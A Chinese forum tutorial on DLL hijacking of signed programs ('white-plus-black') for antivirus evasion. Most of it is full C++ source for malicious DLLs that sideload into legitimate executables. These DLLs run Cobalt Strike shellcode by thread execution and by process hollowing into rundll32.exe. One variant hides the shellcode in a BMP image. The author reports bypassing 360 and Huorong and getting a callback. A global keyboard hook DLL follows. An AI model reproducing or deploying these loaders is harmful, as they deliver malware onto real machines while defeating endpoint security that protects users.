浅谈dll劫持-白加黑免杀指南

alyssa · 发表于 2023-12-1 22:04:14

目录
前置知识
dll加载
dll寻找
DLL劫持-白加黑-导入加载
DLL劫持-白加黑-导出编译
DLL劫持-白加黑-图片分离
hook+dll
原理
win api
核心代码
注意事项

复制代码

前置知识
基础技能

c语言基本知识
win32 API 知识
会在微软官网查询API
PE结构知识
原理

DLL劫持的原理主要就是windows下加载DLL的顺序。在加载DLL的时候，系统会依次从以下六个位置去查找所需要的DLL文件

程序所在目录
系统目录
16位系统目录
Windows目录
当前目录
PATH环境变量中的各个目录
dll加载
dllmain.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <Windows.h>BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: WinExec("calc.exe", SW_NORMAL); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}void msg() { MessageBox(0, L"Dll-1 load succeed!", 0, 0);}framework.h
#pragma once
#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容// Windows 头文件#include <windows.h>extern"C" __declspec(dllexport) void msg(void);a.c
#include <stdio.h>#include <Windows.h>typedef void(*msg)();
int main(){ // 定义一个函数类DLLFUNC HMODULE hDll = LoadLibrary(L"Dll1.dll"); if (hDll == NULL) { printf("1"); return0; } msg func = (msg)GetProcAddress(hDll, "msg"); if (func != NULL) { //运行msg函数 (*func)(); } return0;}dll寻找Process Monitor
IncludeOperation is CreateFile
Operation is LoadImage
Operation is QueryOpen
Path contains .dll
processname is kk.exe
Path begins with C:\test\KKcapture
ExcludeResult is SUCCESS

复制代码

过滤参考
Include the following filters:
Operation is CreateFile
Operation is LoadImage
Path contains .cpl
Path contains .dll
Path contains .drv
Path contains .exe
Path contains .ocx
Path contains .scr
Path contains .sys
Path begins with C:\test\KKcapture

Exclude the following filters:
Process Name is procmon.exe
Process Name is Procmon64.exe
Process Name is System
Operation begins with IRP_MJ_
Operation begins with FASTIO_
Result is SUCCESS
Path ends with pagefile.sys
windbg/procexp

均可一键导出加载的dll

打开待测exe文件
用Process Explorer查看待测exe打开调用的dll
ctrl+s保存文件，使用脚本文件处理，得到一个新的纯dll列表的文件
关闭待测软件，找到exe文件路径
打开chkDllhiJack，将待测exe文件路径以及dll列表填入相对应的位置，点击检测or运行
如果存在dll劫持漏洞，则输出框内出现对应的dll文件名;如果不存在，则提示no valid xxx;
复制payload.dll文件（打开计算器），改名为对应的dll文件名，放在exe文件同一路径下，双击exe文件，查看打开exe文件的同时是否开启了计算器。
DLL劫持-白加黑-导入加载
procexp/火绒剑分析dll,选择一个dll文件来进行劫持,尽量找文件较小的dll文件

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include<windows.h>#include<iostream>HANDLE My_hThread = NULL;unsignedchar shellcode[] = "";//CS生成32位shellcodeDWORD WINAPI ceshi(LPVOID pParameter){ __asm { mov eax, offset shellcode jmp eax } return0;}BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH://初次调用dll时执行下面代码 My_hThread = ::CreateThread(NULL, 0, &ceshi, 0, 0, 0);//新建线程 case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}extern"C" _declspec(dllexport) void test(){ int a; a = 0;}

复制代码

接下来利用Stud_PE来加载我们生成的dll,将修改后的libfontconfig-1.dll以及我们生产的dll文件都拖到kk录像机安装目录

dll被杀烂了，尝试强加密绕过杀软

DLL劫持-白加黑-导出编译
cloudmusic_reporter.exe(并发现是32位程序)单独复制出来运行会产生报错缺少dll文件。将缺失的dll文件复制到相同文件夹后即可成功运行

使用Dependencies工具对krpt.dll进行反编译，导出krpt.dll源码
使用visual studio 创建一个新项目。项目名称右键——打开项目位置——将反编译的dll源码复制进去。
选中dll源码拖入项目，工具就会自动加载源码
打开asm文件，将所有的jmp语句删除
根据文件中的教程，选中文件——右键属性——修改——点击应用
项目名称——右键属性——c/c++——代码生成——运行库——多线程(/MT)
预编译头——不使用预编译头
链接器——调试——生成调试信息——选择否

在libcurl.c中添加一句#include "pch.h"完整代码结构如下
framework.h
#pragma once
#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容// Windows 头文件#include <windows.h>libcurl.h
#ifndef libcurl_H#define libcurl_H//aheadlib plugin for csharp.by snikeguo,email:408260925@qq.com//codegen time:2023-11-24 11:06:32:169#include<Windows.h>#include<Shlwapi.h>extern PVOID pfnAL_curl_easy_cleanup;//curl_easy_cleanup.......pch.h
// pch.h: 这是预编译标的头文件。// 下方列出的文件仅编译一次，提高了将来生成的生成性能。// 这还将影响 IntelliSense 性能，包括代码完成和许多代码浏览功能。// 但是，如果此处列出的文件中的任何一个在生成之间有更新，它们全部都将被重新编译。// 请勿在此处添加要频繁更新的文件，这将使得性能优势无效。
#ifndef PCH_H#define PCH_H
// 添加要在此处预编译的标头#include "framework.h"
#endif //PCH_H

复制代码

dllmain.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <Windows.h>#include "libcurl.h"BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: MessageBox(0, L"Dll-1 load succeed!", 0, 0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}void msg() { MessageBox(0, L"Dll-1 load succeed!", 0, 0);}libcurl.c
#include"libcurl.h"#include "pch.h"........libcurl_jump.asm
.686P.MODEL FLAT,C.DATA.......pch.cpp
// pch.cpp: 与预编译标头对应的源文件
#include "pch.h"
// 当使用预编译头时，需要使用此源文件，编译才能成功。
py脚本
处理dll格式
with open('a.txt','r',encoding="utf-8") as f: for i in f: print(i.split(' ')[-1])处理jmp
with open('a.txt','r',encoding="utf-8") as f: for i in f: if "jmp" not in i: print(i)成功弹出计算器，换成上线代码dllmain.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <Windows.h>#include "libcurl.h"BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { unsigned char hexData[] = ""; char* v7A = (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u); memcpy((void*)v7A, hexData, _countof(hexData));
struct _PROCESS_INFORMATION ProcessInformation; struct _STARTUPINFOA StartupInfo; void* v24; CONTEXT Context; DWORD DwWrite = 0; memset(&StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb = 68; BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation); if (result) { Context.ContextFlags = 65539; GetThreadContext(ProcessInformation.hThread, &Context); v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u); WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), &DwWrite); Context.Eip = (DWORD)v24; SetThreadContext(ProcessInformation.hThread, &Context); ResumeThread(ProcessInformation.hThread); CloseHandle(ProcessInformation.hThread); result = CloseHandle(ProcessInformation.hProcess); }
TerminateProcess(GetCurrentProcess(), 0); };
case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}

复制代码

成功过360，测试发现火绒也可绕过

DLL劫持-白加黑-图片分离
python2 dkmc.py
gen
set shellcode 这里是CS的shellcode
run
dllmain.cpp

#define _CRT_SECURE_NO_DEPRECATE #include "framework.h"#include "windows.h"#include "libcurl.h"#include <stdlib.h>#include <stdio.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { FILE* fp; // 定义流式文件操作变量fp，FILE结构体在stdio.h里面有定义 size_t size; // 定义文件字节数变量size unsigned char* buffer; // 定义缓存指针变量
fp = fopen("output-1700840239.bmp", "rb"); //****修改为上方生成的图片**** // fseek()负号前移，正号后移 fseek(fp, 0, SEEK_END); // 文件指针指向文件末尾 // ftell()返回给定流 stream 的当前文件位置 size = ftell(fp); // size值为文件大小 fseek(fp, 0, SEEK_SET); // 文件指针指向文件开头 buffer = (unsigned char*)malloc(size); // 动态申请图片大小的内存空间（数组指针） fread(buffer, size, 1, fp); // 从fp读取和显示1个size大小的数据
char* v7A = (char*)VirtualAlloc(0, size, 0x3000u, 0x40u); memcpy((void*)v7A, buffer, size);
struct _PROCESS_INFORMATION ProcessInformation; struct _STARTUPINFOA StartupInfo; void* v24; CONTEXT Context; DWORD DwWrite = 0; memset(&StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb = 68; BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation); if (result) { Context.ContextFlags = 65539; GetThreadContext(ProcessInformation.hThread, &Context); v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, size, 0x1000u, 0x40u); WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, size, &DwWrite); Context.Eip = (DWORD)v24; SetThreadContext(ProcessInformation.hThread, &Context); ResumeThread(ProcessInformation.hThread); CloseHandle(ProcessInformation.hThread); result = CloseHandle(ProcessInformation.hProcess); }
TerminateProcess(GetCurrentProcess(), 0); }; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}

复制代码

将exe，dll及图片放在一起再次运行,成功上线

hook+dll
原理
当我们通过键盘输入，系统(OS)会把键盘输入这个事件发送到系统消息队列（OS message queue）
随后系统会从这个消息队列里拿出这个事件，判断这个输入是在哪个程序发生的。
发送到输入发生地程序的消息列表中（application message queue）
目标程序把键盘输入的事件拿出，执行并显示

win api
HINSTANCE和HMODULE

HINSTANCE的本质是模块基地址，他仅仅在同一进程中才有意义，跨进程的HINSTANCE是没有意义
HMODULE 是代表应用程序载入的模块，win32系统下通常是被载入模块的线性地址。
HINSTANCE 在win32下与HMODULE是相同的东西(只有在16位windows上，二者有所不同).
SetWindowsHookExW

HHOOK SetWindowsHookExW(
  [in] int    idHook,
  [in] HOOKPROC  lpfn,
  [in] HINSTANCE hmod,
  [in] DWORD    dwThreadId
);

idHook 如键盘事件WH_KEYBOARD,安装监视击键消息的挂钩过程
HOOKPROC lpfn——钩子的处理函数，若设置的是键盘输入钩子，必须是微软定义的一个叫KeyboardProc的函数。
HINSTANCE hmod——模块句柄，因此一般设置钩子的地方在DLL中。
DWORD dwThreadId——需要设置钩子的线程ID，倘若为0则为全局钩子（所有程序都钩）。
KeyboardProc

LRESULT CALLBACK KeyboardProc(
  _In_ int code,
  _In_ WPARAM wParam,
  _In_ LPARAM lParam
);

code 如果小于零，挂钩过程必须将消息传递给 CallNextHookEx 函数，而无需进一步处理，并且应返回 CallNextHookEx 返回的值
wParam 生成击键消息的密钥的虚拟密钥代码。
lParam 31转换状态,如果按下键，则值为 0;如果释放键，则值为 1。
!(lParam & 0x80000000) 第三十二位的1和lParam的31位相与运算，按下键时判断为真
EXTERN_C，__declspec(dllexport)

#define EXTERN_C    extern "C"
__declspec(dllexport)关键字从 DLL 中导出数据、函数、类或类成员函数
GetLastError

返回值是调用线程的最后错误代码
UnhookWindowsHookEx

BOOL UnhookWindowsHookEx(
  [in] HHOOK hhk
);
删除 SetWindowsHookEx 函数安装在挂钩链中的挂钩过程。
hhk 要移除的挂钩的句柄
DllMain

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD    fdwReason,
  _In_ LPVOID lpvReserved
);
hinstDLL DLL 模块的句柄,值是 DLL 的基址
GetModuleFileNameA

检索包含指定模块的文件的完全限定路径,模块必须已由当前进程加载
DWORD GetModuleFileNameA(
  [in, optional] HMODULE hModule,
  [out]       LPSTR lpFilename,
  [in]          DWORD nSize
);
hModule 正在请求其路径的已加载模块的句柄.此参数为 NULL，则 GetModuleFileName 将检索当前进程的可执行文件的路径
strrchr

C 库函数 char *strrchr(const char *str, int c) 在参数 str 所指向的字符串中搜索最后一次出现字符 c（一个无符号字符）的位置。
如果找到字符，它将返回一个指向该字符的指针，否则返回 NULL
核心代码
dllmain.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <Windows.h>#include <stdio.h>
HINSTANCE g_hDll;HHOOK g_hHook;
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: g_hDll = hModule; break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}
LRESULT CALLBACK KeyboarProc(int nCode, WPARAM wParam, LPARAM lParam){ char szPath[MAX_PATH]; char* p = NULL; if (nCode >= 0) { if (!(lParam & 0x80000000)) { GetModuleFileNameA(NULL, szPath, MAX_PATH); p = strrchr(szPath, '\\'); if (!_stricmp(p + 1, "notepad.exe"))//只对notepad进程拦截 { return1; } } } return CallNextHookEx(g_hHook, nCode, wParam, lParam);}
EXTERN_C __declspec(dllexport) void HookStart(){ g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboarProc, g_hDll, 0); DWORD errCode = GetLastError(); printf("%d", errCode);}
EXTERN_C __declspec(dllexport) void HookStop(){ if (g_hHook) { UnhookWindowsHookEx(g_hHook); g_hHook = NULL; }}inject.c
//hook.cpp#include <Windows.h>#include <conio.h>#include <stdio.h>
typedef void(*HOOKSTART)();typedef void(*HOOKSTOP)();
int main(){ HMODULE hDll = LoadLibrary(L"KeyHook.dll"); if (!hDll) { return0; }
HOOKSTART hookStart = (HOOKSTART)GetProcAddress(hDll, "HookStart"); if (!hookStart) { return0; } HOOKSTOP hookStop = (HOOKSTOP)GetProcAddress(hDll, "HookStop"); if (!hookStop) { return0; } hookStart(); printf("press 'q' to quit\n");
while (_getch() != 'q') { }
hookStop();
FreeLibrary(hDll);}

复制代码

效果展示

typora可以正常输入，但是输入时被加载KeyHook.dll
notepad无法输入，且按下键盘被加载KeyHook.dll

注意事项
电脑为64位，所以应该编译成64位运行，否则32位的DLL不能注入64位的程序就会整个窗口卡住。即按键事件分发不到具体的钩子处理函数，而事件已经被标志为已挂钩，必须找到处理函数。这就会产生事件无法得到处理，程序卡死的现象

		自动登录	找回密码
密码			立即注册

浅谈dll劫持-白加黑免杀指南

本帖子中包含更多资源